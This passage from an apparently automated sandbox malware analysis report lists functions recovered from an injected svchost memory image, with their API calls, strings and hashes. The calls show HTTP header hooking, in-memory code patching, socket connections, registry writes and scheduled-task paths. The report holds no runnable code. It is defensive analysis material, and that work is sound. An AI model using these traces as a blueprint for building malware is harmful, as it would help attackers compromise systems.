VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D10B76
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02D10BBC
HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02D10BCF

Strings

Accept-Encoding:, xrefs: 02D10BC9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$HeadersHttpRequest
String ID: Accept-Encoding:
API String ID: 853579731-3444961765
Opcode ID: 93934c96886794045a00a870da3442afa17be74aec044401d79a24b4575ff291
Instruction ID: 8886ed967339a63591b6d3874ce7ba02775527f8fbbf14e081cc3135b3e17e1e
Opcode Fuzzy Hash: 93934c96886794045a00a870da3442afa17be74aec044401d79a24b4575ff291
Instruction Fuzzy Hash: 5731FBB5D01219AFDB40DFA9E981EEEBBB9EF88314F50451AE914E3300E3745D41CBA0

Function 02D109E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D10A13
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D10A3F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D10A66
HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02D10AAC
HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02D10ABF

Strings

Accept-Encoding:, xrefs: 02D10AB9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$HeadersHttpRequest
String ID: Accept-Encoding:
API String ID: 853579731-3444961765
Opcode ID: 7491ee411e79634145fbb9a02be6b3877a92ea60d5590cec5318a6466e11c48b
Instruction ID: 13bc69ca2e1cca2bceb11d2987a93fe023795fb15a1a52e79c36336edc921716
Opcode Fuzzy Hash: 7491ee411e79634145fbb9a02be6b3877a92ea60d5590cec5318a6466e11c48b
Instruction Fuzzy Hash: E331EAB5D41219AFDB40DFA9E981AEEBBB9EF48314F51812AE914A3340D3749D408BA0

Function 02D05900 Relevance: 10.6, APIs: 7, Instructions: 97synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D05918
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05949
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05975
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0599C
WaitForSingleObject.KERNEL32(0000030C,000003E8), ref: 02D059CD
ReleaseMutex.KERNEL32(0000030C), ref: 02D059EE
SetLastError.KERNEL32(?), ref: 02D059F8

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 2971961948-0
Opcode ID: 98ac9879f08598d88f40d1369df865b19ab8eb66f04690c6c00b6077698eeb00
Instruction ID: 7bc19878ffd5a9f4dcced8e4dc15d878a6c9a12e7037b8800b0c30847bf69dc1
Opcode Fuzzy Hash: 98ac9879f08598d88f40d1369df865b19ab8eb66f04690c6c00b6077698eeb00
Instruction Fuzzy Hash: 6231E5B5E40218EFDB40CFA9E984AADBBF5FB48310F90456AE908E7340E7705D158F90

Function 02D0B930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0B96F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0B99B
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0B9C2
GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02D0B9F1
lstrcmpiA.KERNEL32(?,a3b7feb4a), ref: 02D0BA07

Strings

a3b7feb4a, xrefs: 02D0B9FB

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$InformationObjectUserlstrcmpi
String ID: a3b7feb4a
API String ID: 410342393-1933805477
Opcode ID: 9c6dd4e08bf84d873849e630e5298b54a6b4881a706294fc9dbcae0edc027c13
Instruction ID: 23ee815300c867473b70cb0cae6f3d2ef5d6915a707d52578a99af4c646a3c09
Opcode Fuzzy Hash: 9c6dd4e08bf84d873849e630e5298b54a6b4881a706294fc9dbcae0edc027c13
Instruction Fuzzy Hash: 2031DBB1E4121DAFDB40CFA9E885AEEBBF4FB48304F50846AE518E7240E7755A45CF90

Function 02D1A2B0 Relevance: 10.6, APIs: 7, Instructions: 72memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8), ref: 02D1A2CB
VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02D1A318
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02D1A347
FlushInstructionCache.KERNEL32(00000000), ref: 02D1A34E
VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02D1A362
ReleaseMutex.KERNEL32(?), ref: 02D1A379
Sleep.KERNEL32(00000064), ref: 02D1A381

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
String ID:
API String ID: 842647815-0
Opcode ID: 4c6190af1a1c6820b485a2df1bbd001d5d25a90ad75fb6553b4fa8a87e13603b
Instruction ID: ec214fefa928b6442478ae29f8668b86ab086ff88c1c6b372190b156df776dba
Opcode Fuzzy Hash: 4c6190af1a1c6820b485a2df1bbd001d5d25a90ad75fb6553b4fa8a87e13603b
Instruction Fuzzy Hash: C421F879A40601EFD718CF54E984F5AB7A5FB58700F118918EA4A5BB90CB70FD54CB90

Function 02D30E50 Relevance: 10.6, APIs: 7, Instructions: 67networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 02D30E74
inet_addr.WS2_32(?), ref: 02D30E7F
htonl.WS2_32(000000FF), ref: 02D30E8A
gethostbyname.WS2_32(?), ref: 02D30E96
socket.WS2_32(00000002,00000001,00000000), ref: 02D30EB0
connect.WS2_32(00000000,?,00000010), ref: 02D30EC3
closesocket.WS2_32(00000000), ref: 02D30ECE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
String ID:
API String ID: 298246419-0
Opcode ID: c518ca5fe24f9eeda070798196f1e8210076d9bcb2babbbba3ff060da90354e4
Instruction ID: 88255eacbeb3ff9993c2477fc3707292571741adbc508f6295f560e3a4f15e06
Opcode Fuzzy Hash: c518ca5fe24f9eeda070798196f1e8210076d9bcb2babbbba3ff060da90354e4
Instruction Fuzzy Hash: 7711AF35B10208AFDB00DFA8EC44BAAB7FAFF54321F804669FA15A7390D7709C108B90

Function 02D0D6C0 Relevance: 10.6, APIs: 7, Instructions: 53synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D0D690,00000000,00000000,00000000), ref: 02D0D6D4
GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D09B2A,?,?,?,?,02D09CF9,00000000,?,?,?,?,02D091A0), ref: 02D0D6EC
CloseHandle.KERNEL32(00000000,?,?,02D09B2A,?,?,?,?,02D09CF9,00000000,?,?,?,?,02D091A0,?), ref: 02D0D6FD
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02D09B2A,?,?,?,?,02D09CF9,00000000,?,?,?,?,02D091A0), ref: 02D0D70C
ReleaseMutex.KERNEL32(00000000), ref: 02D0D740
IsWindow.USER32(?), ref: 02D0D747
PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02D0D75B

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
String ID:
API String ID: 731183410-0
Opcode ID: 0901c4bd468298381220f237cae45f43975cdbaa77ac0c7e7c08fdb2196ac5a4
Instruction ID: abce0a46a911d3933a7ea2559cd8e9ab9f8532696a26711ac45cfaeb0b707b63
Opcode Fuzzy Hash: 0901c4bd468298381220f237cae45f43975cdbaa77ac0c7e7c08fdb2196ac5a4
Instruction Fuzzy Hash: 6F11A134A81314ABE3109FA0EC8DF9A7BE8EF15714F644695F906AB3D0D7B06D10CB94

Function 00403310 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
OpenProcessToken.ADVAPI32(00000000), ref: 00403360
GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
CloseHandle.KERNEL32(00000000), ref: 00403397

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 00403319

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
String ID: \\?\globalroot\systemroot\system32\tasks\
API String ID: 4133869067-1576788796
Opcode ID: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction ID: 49b559ea0f9bb78937d1c0884117093763843d0ff56e3b8f35a0dc65749093db
Opcode Fuzzy Hash: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction Fuzzy Hash: E60165B5A00208EBEB20DFA4DD4DB9F7B7CAB44715F0080A6EA05B2280DA749B44DF64

Function 02D0C2A0 Relevance: 10.5, APIs: 7, Instructions: 47windowsleepthreadCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 02D0C2A8
GetWindowThreadProcessId.USER32(?,?), ref: 02D0C2B7
Sleep.KERNEL32(00000000), ref: 02D0C30F

Part of subcall function 02D0C220: GetWindowInfo.USER32(?,?), ref: 02D0C254
Part of subcall function 02D0C220: SetWindowLongA.USER32(?,000000EC,?), ref: 02D0C276
Part of subcall function 02D0C220: SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 02D0C289

GetClassLongA.USER32(?,000000E6), ref: 02D0C2D0
SetClassLongA.USER32(?,000000E6,00000000), ref: 02D0C2E3
SendMessageA.USER32(?,000000D2,00000000,00000000), ref: 02D0C2FA
SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 02D0C30A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Long$ClassMessageSend$AttributesInfoLayeredProcessSleepThreadVisible
String ID:
API String ID: 923153955-0
Opcode ID: 8a4e1a57af4894dab8ecb9acb91a97bd7568ac25665409c07bcfdeaa0daec1c0
Instruction ID: 85d7cbce4ad7c1d831187923f205fd4c53ec4e4bb4c3085a62bc429a665c4d23
Opcode Fuzzy Hash: 8a4e1a57af4894dab8ecb9acb91a97bd7568ac25665409c07bcfdeaa0daec1c0
Instruction Fuzzy Hash: AA01F9366902147BE6206F64FC49FDE379C9F56B65F900302F604BA3D0C7946D11CAB9

Function 02D193A0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000001), ref: 02D193BB
shutdown.WS2_32(02D1949C,00000001), ref: 02D193C0
recv.WS2_32(02D1949C,?,00000400,00000000), ref: 02D193DF
recv.WS2_32(?,?,00000400,00000000), ref: 02D193F5
closesocket.WS2_32(?), ref: 02D19409
closesocket.WS2_32(02D1949C), ref: 02D1940C
ExitThread.KERNEL32 ref: 02D19410

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: closesocketrecvshutdown$ExitThread
String ID:
API String ID: 1638183600-0
Opcode ID: 7cce69c3dfcb08b5b1dfe87c12a1f9f9fe850de5e818c0491ce3890d0c381d25
Instruction ID: b2a4eef1a593f50bd8bd9e299030f2617325e20d0b9a963606cf90f6f8f5e4b9
Opcode Fuzzy Hash: 7cce69c3dfcb08b5b1dfe87c12a1f9f9fe850de5e818c0491ce3890d0c381d25
Instruction Fuzzy Hash: C1F044B69503187BD7209E65DC95FAB3BADAB48B50F444444BB09BB2C0D6B4FD01CEE4

Function 02D03A70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02D03BDC,?), ref: 02D03A90
RegSetValueExA.ADVAPI32(00000000,a3b7fb2ea,00000000,00000004,?,00000004,?,?,02D03BDC,?), ref: 02D03AAC
RegFlushKey.ADVAPI32(00000000,?,?,02D03BDC,?), ref: 02D03ABA
RegCloseKey.ADVAPI32(00000000,?,?,02D03BDC,?), ref: 02D03AC8

Strings

a3b7fb2ea, xrefs: 02D03AA6
software\microsoft, xrefs: 02D03A7F

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFlushOpenValue
String ID: a3b7fb2ea$software\microsoft
API String ID: 2510291871-2833742656
Opcode ID: b3b7051774e93355194c8ccabb8aef652d639f2c4c4d5a963d51b70895157395
Instruction ID: 156a2f5042945126dbe999412144163cc2a232c4d598cacaa49c538d9995a46c
Opcode Fuzzy Hash: b3b7051774e93355194c8ccabb8aef652d639f2c4c4d5a963d51b70895157395
Instruction Fuzzy Hash: EDF01DB9A50208FBEB10CEA1ED49FAE77ACAB14705F604454FA01A6380D6B1EE14D6A0

Function 00401600 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040160B
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Strings

ntdll.dll, xrefs: 00401617
RtlUniform, xrefs: 00401626
)@, xrefs: 00401644

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll$)@
API String ID: 1545651562-3472953331
Opcode ID: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction ID: a861cb93b7f16bf3c872219f5ba967f96d5ad720afefe63f3816ea97d3f010e1
Opcode Fuzzy Hash: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction Fuzzy Hash: 89E01AB0600310DBEB009FB2AD09A563699AA94B113448836A709F21E2DA3CD810CA6D

Function 02D291D0 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D29236
HeapValidate.KERNEL32(00000000), ref: 02D2923D
GetProcessHeap.KERNEL32(00000000,?), ref: 02D2924A
HeapFree.KERNEL32(00000000), ref: 02D29251
GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D29260
HeapValidate.KERNEL32(00000000), ref: 02D29263
GetProcessHeap.KERNEL32(00000000,?), ref: 02D29270
HeapFree.KERNEL32(00000000), ref: 02D29273

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: 282c9f9a5f8f5157bd40996ac381346e007457e3019a42d990a7b1cf44fd4272
Instruction ID: 8e5eb06db8b06f41a4355495b859c016760e846ea45f03d6ba4fc29beb491085
Opcode Fuzzy Hash: 282c9f9a5f8f5157bd40996ac381346e007457e3019a42d990a7b1cf44fd4272
Instruction Fuzzy Hash: F931EB35900314ABDB20DFA5D848BDB7BA9EF95318F548549ED05A7341C730DD54CBA0

Function 02D293D0 Relevance: 10.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa4c55354c27217b82496c46681aec1e0351a4c3f482cbc434c2da311e81b48
Instruction ID: 05e4d9adfa9a8b0c548a677e6f70e85d5236746a7871e1f51bf85a4f10f29e8f
Opcode Fuzzy Hash: 9aa4c55354c27217b82496c46681aec1e0351a4c3f482cbc434c2da311e81b48
Instruction Fuzzy Hash: 45019E76A853246BD7606FE9BC88F9B7B9CEFA1759F604422F60887340C6749C14CAB1

Function 02D2E22A Relevance: 9.1, APIs: 6, Instructions: 141fileCOMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02D2E0CF
MoveFileA.KERNEL32(?,?), ref: 02D2E2BD
GetFileAttributesA.KERNEL32(?), ref: 02D2E301
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D2E373

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateDirectoryMovefree
String ID:
API String ID: 1026147201-0
Opcode ID: 4004118e903fdadca49e94681bcd9136e6048a6b50fb9b0dbd257f852616d431
Instruction ID: 7c318f7eb8ad0e9abcce24f91684f5afc3dcf3a754c1b8b1a8e43e4ecf860584
Opcode Fuzzy Hash: 4004118e903fdadca49e94681bcd9136e6048a6b50fb9b0dbd257f852616d431
Instruction Fuzzy Hash: D24156349043798FCB218E789884BEA7FE59F36309F148999E5C287341D731AD0ECBA0

Function 02D28610 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02D28654
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02D28F97), ref: 02D2866E
memcpy.MSVCRT ref: 02D28696
UnmapViewOfFile.KERNEL32(?,?,?,?,?,02D28F97), ref: 02D286A2

Part of subcall function 02D25580: GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D25295,02D213E0,00000000), ref: 02D25594
Part of subcall function 02D25580: CloseHandle.KERNEL32(00000000,?,?,02D25295,02D213E0,00000000), ref: 02D255A5

memcpy.MSVCRT ref: 02D286CE
WriteFile.KERNEL32(?,?,00140B17,02D28F97,00000000,00140B17), ref: 02D28700

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
String ID:
API String ID: 3741995677-0
Opcode ID: 2d910dc9832589e3e5bb7e666130afd5cff54d8a77466fdfc97d70f6f8ac2471
Instruction ID: c8d229666bfa6e61fc134c489b1cbcb2e73103ca910986aeaf162e431ea96c66
Opcode Fuzzy Hash: 2d910dc9832589e3e5bb7e666130afd5cff54d8a77466fdfc97d70f6f8ac2471
Instruction Fuzzy Hash: 6131BCB2A00219BBD300DF98E880F6AF7B8FF68315F10821AE90497740D770AD64CBE0

Function 02D190D0 Relevance: 9.1, APIs: 6, Instructions: 106networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 02D190FE
VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D1912F
VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D1915B
VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D19182
IsBadReadPtr.KERNEL32(?,00000004), ref: 02D191A4
WSASetLastError.WS2_32(?), ref: 02D191CE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$Read
String ID:
API String ID: 2835504744-0
Opcode ID: d5aa6415e3d2f32ec2615b46be2b6ba58daa1083a9e532fe6fae5f09632c07e0
Instruction ID: 54dc9fee6a3529715eb145e6f83ac03e27c8184df29a6d01390b8c42c8044375
Opcode Fuzzy Hash: d5aa6415e3d2f32ec2615b46be2b6ba58daa1083a9e532fe6fae5f09632c07e0
Instruction Fuzzy Hash: 5C41D8B5E00209AFDB40CFA9E995AEEBBF5FF48200F508569E909E7300E3749951CF90

Function 02D30AF0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 02D30E50: htons.WS2_32(?), ref: 02D30E74
Part of subcall function 02D30E50: inet_addr.WS2_32(?), ref: 02D30E7F
Part of subcall function 02D30E50: htonl.WS2_32(000000FF), ref: 02D30E8A
Part of subcall function 02D30E50: gethostbyname.WS2_32(?), ref: 02D30E96
Part of subcall function 02D30E50: socket.WS2_32(00000002,00000001,00000000), ref: 02D30EB0
Part of subcall function 02D30E50: connect.WS2_32(00000000,?,00000010), ref: 02D30EC3
Part of subcall function 02D30E50: closesocket.WS2_32(00000000), ref: 02D30ECE

setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02D30B2F
closesocket.WS2_32 ref: 02D30B44

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
String ID:
API String ID: 2706992148-0
Opcode ID: bb44f2aa397946b6951278751fd685d72ee4f4fafa8aab18c84bac9da4559941
Instruction ID: 3293d64d038a7f634ce9664cc58fc030ee7634994d9323b96dde44df75c1d1dc
Opcode Fuzzy Hash: bb44f2aa397946b6951278751fd685d72ee4f4fafa8aab18c84bac9da4559941
Instruction Fuzzy Hash: 9131E170A00215BFD711CF68E844BEAB7A9FF14316F908256F614D6280EB719D60CBE1

Function 02D02990 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02D029AF
exit.MSVCRT ref: 02D029BD
calloc.MSVCRT ref: 02D029C9
exit.MSVCRT ref: 02D029D6
free.MSVCRT(00000000,?,00000000,?,?,?), ref: 02D02A2A
free.MSVCRT(?), ref: 02D02A4E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: 5fc4641af49eefefc238622a6c44650a3ebbdef26433579bdf0701521725b0db
Instruction ID: 1892e4ecd6c0b1fb2b34200fcecc905ecfedfc14966c3859ffc826db2d0c4dda
Opcode Fuzzy Hash: 5fc4641af49eefefc238622a6c44650a3ebbdef26433579bdf0701521725b0db
Instruction Fuzzy Hash: 40213C75A413099FDB20CF59DCC9BAB77A8AB48314F044529FD4597350E771DD10CBA1

Function 02D24EE0 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02D24EFB
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D24F2C
TranslateMessage.USER32(?), ref: 02D24F48
